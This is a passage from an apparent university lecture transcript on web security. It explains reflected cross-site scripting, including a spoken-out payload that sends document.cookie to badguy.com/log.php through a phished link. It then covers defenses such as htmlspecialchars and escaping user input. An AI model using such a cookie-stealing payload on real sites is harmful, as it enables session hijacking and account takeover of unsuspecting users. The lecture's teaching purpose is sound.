HTML source code that you're returning to me. So if I didn't make any syntax errors here, I think what I just did was I properly closed the input element, giving it no value. Then I put a bold-faced hi in your web page that you're showing me, and then I started a span, and then because I needed to close your quote and close your tag later. And actually, yeah, that kind of works. It's an empty span element. So now who's this hurting? Maybe it's hurting me, because this is just stupid. Now I've said hi to myself. But what if I don't put a bold-faced tag in there? What if I actually am really smart and I do something like a script tag, and then I put some JavaScript code here, and then close this script tag? Now I can trick you into inserting some JavaScript code into your web page, thereby making the origin you, and now I can read anything you can read via my JavaScript. I can read your cookies. I can read anything from your original site. So what does this mean? Well, back to the sample scenario at hand. Suppose the user, and I wrote it out long form here, suppose I, the bad guy, type into your web form something like script, document.location equals, quote unquote, badguy.com/log.php cookie equals document.cookie. Now, this is a lot to wrap your mind around, but what I have just done is tricked the user. Actually, let me scroll back here. Sorry. The scenario is not that I, the bad guy, am filling out your form, but rather I am inducing a naive user via a phishing attack or something like that to click a URL like this, which I hid in the phishing email, because when the user now visits vulnerable.com, it's as though they are filling out the foo field, because I'm passing it in as a get parameter called foo. But what they're really apparently typing in there is essentially some JavaScript code that, because of the way I've constructed it, is going to check the value of document.cookie, which is the cookie value for all of the cookie values for vulnerable.com that belong to the user that I just tricked into clicking this link via my phishing attack or whatever. And what am I doing? I'm passing document.cookie, all of that user's cookies for that website, to my domain, badguy.com/log.php. In effect, I'm stealing all of their cookie values for vulnerable.com and logging them on my own server. The implication is that this is a way of hijacking users' session for an arbitrary website. I don't have to be sitting next to them in Starbucks anymore. I just have to know with some probability what websites this user likes to use. I have to know that that website made a stupid mistake with the coding of their website. They're not escaping the user's input and therefore are allowing code like this to get executed. And the end result is that I'm logging somewhere on my own server this user's cookies for vulnerable.com, and if among those cookies are like a session ID and maybe a username cookie, anything like that, now I can be someone in some random country abroad, and I can now very quickly log into facebook.com or vulnerable.com using that PHP sesh ID by sending it, forging my header, and voila, now I'm logged into that random person's account, only because they happened to click on a URL and because that website was flawed with an XSS vulnerability. And these are not that hard. So though this scenario might seem very contrived for you, the sort of the simplest one that I could propose here for badguy.com and vulnerable.com, but realize that it boils down to a very common trick, which is something like this. So what is the solution to this? Before we had HTML, before we had MySQL real escape string, what do we have now? Okay, good. So it starts with HTML. HTML special chars. This is the PHP version of a function that will change any open brackets to entities, any closed brackets to entities, and things that might trip up a browser's parser. So this, too, is something you should just call habitually anytime you are echoing to the screen something that a user has written. So what are the fundamental defenses other than not making this mistake? Well, as a user, don't click links, right? Phishing attacks, they're kind of falling out of vogue. It seems people have started to catch on that PayPal does not personally email them asking for passwords. But this happens very recently. I've actually been keeping a folder because in the fall in the spring of this year, I teach this very introductory course, E1, at the Extension School, where we just talk about what is spam and what are phishing attacks. So much lower level than this course. But I have a nice, juicy folder of all these wonderful phishing attacks that I still get once in a while. So the Harvard.edu system administrators just emailed everyone asking to confirm their usernames and passwords. These are gems. Like, this stuff still happens. But again, you think about it. You send an email like this to 20,000 Harvard affiliates, there's going to be one idiot, right? There's going to be someone who replies with their username and password, and bam, you're in, right? It's a numbers game. Email's pretty free to send, so you just leverage the masses. But you, the developer, could just never trust user input, and you shouldn't ever trust user input. Even I, and I think I've preached this before, even I, when I know that the user ID in my database is going to be numeric, frankly, even I spend the computational cycles to just call MySQL real escape string, at least on some programs where scalability is not the most important thing, but security is. Just because, what if I screw up once and I put some bogus value into the user ID field? At least this way I don't even trust myself. I pay for it computationally, but at least it's not a bad principle to live by. Or encoding all user input. When you store it in your database or before you even echo it back out, convert everything to entities or to some other form altogether. So hopefully you've seen a whole bunch of scary stuff today, most of which you can mitigate either as a developer or as a user. And next week what we'll talk about is scalability. So dealing with all of these things, but for hundreds or thousands of users at once. See you next week.